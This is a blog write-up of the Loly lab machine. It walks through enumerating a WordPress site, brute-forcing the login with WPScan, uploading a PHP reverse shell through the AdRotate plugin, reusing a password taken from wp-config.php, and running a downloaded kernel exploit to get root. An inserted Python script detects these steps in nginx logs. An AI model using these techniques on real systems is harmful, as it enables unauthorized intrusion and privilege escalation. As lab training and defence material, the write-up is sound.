K0Hack's personal blog on ethical hacking concepts // HTB // TryHackMe // hacking write-ups // tools for various tasks.

Loly machine from Offensive Security (VIP not required)

Loly ~ Offensive Security ~ VulnHub

We run the first scan with Nmap

$ nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 192.168.224.121

We continue with the next Nmap scan

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We proceed to enumerate the web server

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|   /wordpress/: Blog
|_  /wordpress/wp-login.php: Wordpress login page.

We proceed to use the WPScan tool

         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.14
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.224.121/wordpress/ [192.168.224.121]
[+] Started: Tue May 10 20:43:29 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.224.121/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://192.168.224.121/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.224.121/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.224.121/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.224.121/wordpress/, Match: 'WordPress 5.5'

[i] The main theme could not be detected.
[i] No plugins Found.
[i] No themes Found.
[i] No Timthumbs Found.
[i] No Config Backups Found.
[i] No DB Exports Found.
[i] Medias(s) Identified:

[+] http://192.168.224.121/wordpress/?attachment_id=12
 | Found By: Attachment Brute Forcing (Aggressive Detection)

[i] User(s) Identified:

[+] loly
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue May 10 20:43:56 2022
[+] Requests Done: 3369
[+] Cached Requests: 27
[+] Data Sent: 1007.486 KB
[+] Data Received: 641.986 KB
[+] Memory used: 269.203 MB
[+] Elapsed time: 00:00:27

We find the user loly. We proceed to brute-force the password of the user found.

------------- Brute force with WPScan + rockyou.txt --------------------

# wpscan --url http://192.168.224.121/wordpress --usernames loly --passwords /usr/share/wordlists/rockyou.txt --no-banner
WARNING: Nokogiri was built against libxml version 2.9.10, but has dynamically loaded 2.9.12
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://192.168.224.121/wordpress/ [192.168.224.121]
[+] Started: Tue May 10 20:48:47 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.224.121/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://192.168.224.121/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.224.121/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.224.121/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.224.121/wordpress/, Match: 'WordPress 5.5'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <=============================================> (137 / 137) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando
Trying loly / corazon Time: 00:00:02 <                                             > (175 / 14344573)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: loly, Password: fernando

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue May 10 20:48:54 2022
[+] Requests Done: 316
[+] Cached Requests: 29
[+] Data Sent: 133.992 KB
[+] Data Received: 128.072 KB
[+] Memory used: 229.09 MB
[+] Elapsed time: 00:00:07

User loly, password fernando. We proceed to log in through wp-login.php

Once inside WordPress we quickly identify the following element -> ADROTATE

http://loly.lc/wordpress/wp-admin/admin.php?page=adrotate-media&status=202

It turns out that ADRotate, under Manage Media, offers a file upload. We proceed to upload a .php file, but packed inside a .zip.

We look for it with # locate php-reverse-shell

/usr/share/webshells/php/php-reverse-shell.php

We grab the .php file, change the IP and port, and proceed to zip it:

# zip prs.zip prs.php
updating: prs.php (deflated 60%)

# ls
prs.php  prs.zip  

We start listening with nc -vlnp 443

We upload the file. It uploads successfully. We proceed to look for the path where the file was stored.

http://loly.lc/wordpress/wp-content/banners/

We browse to our file to gain access

http://loly.lc/wordpress/wp-content/banners/prs.php 
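Both the WPScan activity above (author-id enumeration and the XML-RPC password attack) and the PHP file dropped into wp-content/banners/ leave clear traces in the nginx access log. The detection script below is an added example, not part of the original writeup: it parses constructed combined-format log lines (192.168.49.224 is the attacking host's address as shown in this writeup, 10.0.0.5 is a made-up benign client) and flags the three indicators; wp-content/uploads/ is assumed as the standard WordPress media path alongside the banners directory seen on the page.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Added detection example (not from the writeup): scan nginx combined-format access
# log lines for the footprints left on this box: author-id enumeration (?author=N),
# a password attack on xmlrpc.php, and PHP served from a plugin media directory.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
AUTHOR_RE = re.compile(r'[?&]author=(\d+)')
# banners/ is the ADRotate directory seen on the page; uploads/ is assumed as the standard media path.
PHP_IN_MEDIA_RE = re.compile(r'/wp-content/(?:banners|uploads)/[^?]*\.php', re.I)
XMLRPC_WINDOW = timedelta(seconds=60)
XMLRPC_THRESHOLD = 10   # POSTs from one IP inside the window
AUTHOR_THRESHOLD = 3    # distinct author ids probed by one IP

def parse_line(line):
    """Parse one access log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def analyze(lines):
    """Return a sorted list of (ip, indicator, detail) findings."""
    authors, xmlrpc, findings = defaultdict(set), defaultdict(list), set()
    for rec in filter(None, map(parse_line, lines)):
        ip, path = rec["ip"], rec["path"]
        if (a := AUTHOR_RE.search(path)):
            authors[ip].add(a.group(1))
        if rec["method"] == "POST" and path.endswith("/xmlrpc.php"):
            xmlrpc[ip].append(rec["ts"])
        if PHP_IN_MEDIA_RE.search(path):   # PHP must never execute from media dirs
            findings.add((ip, "php_in_media_dir", path))
    for ip, ids in authors.items():
        if len(ids) >= AUTHOR_THRESHOLD:
            findings.add((ip, "author_enum", f"{len(ids)} author ids probed"))
    for ip, times in xmlrpc.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):   # sliding 60 s window over the POSTs
            while t - times[start] > XMLRPC_WINDOW:
                start += 1
            if end - start + 1 >= XMLRPC_THRESHOLD:
                findings.add((ip, "xmlrpc_bruteforce", f">={XMLRPC_THRESHOLD} POSTs/60s"))
                break
    return sorted(findings)

# Constructed sample log (not captured from the machine): 192.168.49.224 is the
# attacking host from the writeup, 10.0.0.5 a made-up benign client.
UA = '"-" "WPScan v3.8.14"'
SAMPLE_LOG = (
    [f'192.168.49.224 - - [10/May/2022:20:43:3{i} +0000] "GET /wordpress/?author={i + 1} HTTP/1.1" 301 0 {UA}'
     for i in range(4)]
    + [f'192.168.49.224 - - [10/May/2022:20:48:{48 + i // 4} +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 1200 {UA}'
       for i in range(12)]
    + ['10.0.0.5 - - [10/May/2022:20:50:01 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 400 "-" "Mozilla/5.0"',
       '192.168.49.224 - - [10/May/2022:21:02:20 +0000] "GET /wordpress/wp-content/banners/prs.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"']
)
```

Calling analyze(SAMPLE_LOG) returns three findings, all attributed to 192.168.49.224, while the single XML-RPC POST from 10.0.0.5 stays below the threshold.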

We receive the shell on our listening session

# nc -vlnp 443
listening on [any] 443 ...
connect to [192.168.49.224] from (UNKNOWN) [192.168.224.121] 43470
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 12:02:22 up  1:10,  0 users,  load average: 1.00, 1.01, 0.96
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (3001): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/$ 
www-data@ubuntu:/var$ ls
backups  cache  lib  local  lock  log  mail  opt  run  spool  tmp  www
www-data@ubuntu:/var$ cd www
www-data@ubuntu:~$ ls
html  local.txt

www-data@ubuntu:~/html/wordpress$ pwd 
/var/www/html/wordpress

www-data@ubuntu:~/html/wordpress$ ls
index.php        wp-blog-header.php    wp-includes        wp-settings.php
license.txt      wp-comments-post.php  wp-links-opml.php  wp-signup.php
readme.html      wp-config.php         wp-load.php        wp-trackback.php
wp-activate.php  wp-content            wp-login.php       xmlrpc.php
wp-admin         wp-cron.php           wp-mail.php

We read wp-config.php and find the following credential -> lolyisabeautifulgirl

wordpress:lolyisabeautifulgirl -> MySQL database

Credential reuse?? loly ??

su loly: lolyisabeautifulgirl
www-data@ubuntu:~/html/wordpress$ su loly
Password: 
loly@ubuntu:/var/www/html/wordpress$ 

We become the user loly with the credential we found

Privilege Escalation ~ Kernel Exploit (Ubuntu 4.4.0.3)

We proceed to enumerate information

loly@ubuntu:/var/www/html/wordpress$ uname -a
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

We search with Searchsploit

 searchsploit ubuntu 4.4.0.3
-------------------------------------------------------------------------------------------------------------------------- -------------------------
 Exploit Title                                                                                                            |  Path
-------------------------------------------------------------------------------------------------------------------------- -------------------------
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                                                      | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                             | linux/local/45010.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)                     | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP) | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation                                    | linux/local/41760.txt
-------------------------------------------------------------------------------------------------------------------------- -------------------------

We fetch the .c exploit

gcc 45010.c -o shell

python3 -m http.server 80  ------- serving the shell binary

From the victim machine, to transfer the exploit

loly@ubuntu:~$ wget http://IP/shell

loly@ubuntu:~$ ls
shell

loly@ubuntu:~$ chmod +x shell

loly@ubuntu:~$ ./shell 
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003489f000
[*] Leaking sock struct from ffff88007bd9e3c0
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880034959780
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880034959780
[*] credentials patched, launching shell...
# whoami
root
# cd /root
# dir
proof.txt  root.txt